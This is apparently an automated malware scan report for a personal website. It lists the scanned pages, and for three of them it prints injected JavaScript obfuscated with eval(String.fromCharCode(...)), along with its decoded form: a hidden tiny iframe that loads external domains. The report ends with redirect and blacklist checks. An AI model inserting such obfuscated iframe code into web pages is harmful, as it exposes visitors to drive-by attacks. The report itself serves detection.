Scanned pages/files
Request | Server response | Status |
http://www.w-williams.com/ | 200 OK Content-Length: 2732 Content-Type: text/html | clean |
http://www.w-williams.com/Wendy_Williams_Resume.pdf | 200 OK Content-Length: 79185 Content-Type: application/pdf | clean |
http://www.w-williams.com/test404page.js | 404 Not Found Content-Length: 73 Content-Type: text/html | clean |
http://www.w-williams.com/projects.php | 200 OK Content-Length: 5712 Content-Type: text/html | clean |
http://www.w-williams.com/icam/icam_102/final_project/index.htm | 200 OK Content-Length: 2032 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,104,111,116,34,59,118,97,114,32,119,61,34,105,34,59,118,97,114,32,114,101,54,61,34,99,97,110,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48)) Decoded script: var hjg4="hot";var w="i";var re6="can.";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="2"></i'+'f'+'rame>');var w6=00503200000210 var hjg4="hot";var w="i";var re6="can.";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="2"></i'+'f'+'rame>');var w6=00503200000210 <iframe src="http://hotican.com/" width="1" height="2"></iframe> Antivirus reports:
| ||
http://l.yimg.com/d/lib/smb/js/hosting/cp/js_source/whv2_001.js | 200 OK Content-Length: 669 Content-Type: application/javascript | clean |
http://www.w-williams.com/cab_cards/2003_2004/ | 200 OK Content-Length: 2251 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48)) Decoded script: var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 <iframe src="http://wollance.com/" width="1" height="3"></iframe> Antivirus reports:
| ||
http://www.w-williams.com/cab_cards/2004_2005/ | 200 OK Content-Length: 2079 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48)) Decoded script: var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340 <iframe src="http://wollance.com/" width="1" height="3"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: w-williams.com
Result:
GET / HTTP/1.1
Host: w-williams.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: w-williams.com
Referer: http://www.google.com/search?q=w-williams.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: w-williams.com
Referer: http://www.google.com/search?q=w-williams.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=w-williams.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://w-williams.com/
Result: w-williams.com is not infected or malware details are not published yet.
Result: w-williams.com is not infected or malware details are not published yet.